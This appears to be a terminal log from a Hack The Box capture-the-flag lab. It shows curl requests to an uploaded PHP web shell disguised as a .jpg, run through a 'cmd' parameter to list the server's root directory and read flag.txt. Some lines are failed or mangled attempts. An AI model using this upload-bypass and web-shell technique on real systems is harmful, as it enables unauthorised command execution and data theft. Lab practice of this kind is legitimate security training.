┌──(redacted㉿redacted-[~/Desktop]
└─$ curl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=ls+/+-la"
total 68
drwxr-xr-x   1 root root 4096 May  4 09:18 .
drwxr-xr-x   1 root root 4096 May  4 09:18 ..
lrwxrwxrwx   1 root root    7 Jul 20  2020 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Apr 15  2020 boot
drwxr-xr-x   5 root root  360 May  4 09:18 dev
drwxr-xr-x   1 root root 4096 Feb 14  2021 etc
-rw-r--r--   1 root root   24 Oct 20  2021 flag.txt
drwxr-xr-x   2 root root 4096 Apr 15  2020 home
lrwxrwxrwx   1 root root    7 Jul 20  2020 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Jul 20  2020 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Jul 20  2020 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Jul 20  2020 libx32 -> usr/libx32
drwxr-xr-x   2 root root 4096 Jul 20  2020 media
drwxr-xr-x   2 root root 4096 Jul 20  2020 mnt
drwxr-xr-x   2 root root 4096 Jul 20  2020 opt
dr-xr-xr-x 442 root root    0 May  4 09:18 proc
drwx------   1 root root 4096 Aug 19  2020 root
drwxr-xr-x   1 root root 4096 Feb 14  2021 run
lrwxrwxrwx   1 root root    8 Jul 20  2020 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 Jul 20  2020 srv
dr-xr-xr-x  13 root root    0 Apr 10 22:10 sys
drwxrwxrwt   1 root root 4096 May  4 09:26 tmp
drwxr-xr-x   1 root root 4096 Jul 20  2020 usr
drwxr-xr-x   1 root root 4096 Aug 19  2020 var
                                                                                                                                                                                                                                                                                                                           
┌──(redacted)-[~/Desktop]
└─$ curl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=cat+/+-flag.txt"
                                                                                                                                                                                                                                                                                                                           
┌──(redacted)-[~/Desktop]
└─$ curl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=c"a"t+/+-flag.txt"
                                                                                                                                                                                                                                                                                                                           
┌──(redacted)-[~/Desktop]
└─$ 
                                                                                                                                                                                                                                                                                                                           
┌──(eredacted)-[~/Desktop]
└─$ curl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=c"a"tcurl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=ls+/+-la"+/+-flag.txt"
                                                                                                                                                            
┌──(redacted-[~/Desktop]
└─$ curl "http://83.136.251.68:53279/profile_images/shell.phar::.jpg?cmd=cat+/flag.txt"
HTB{redacted}

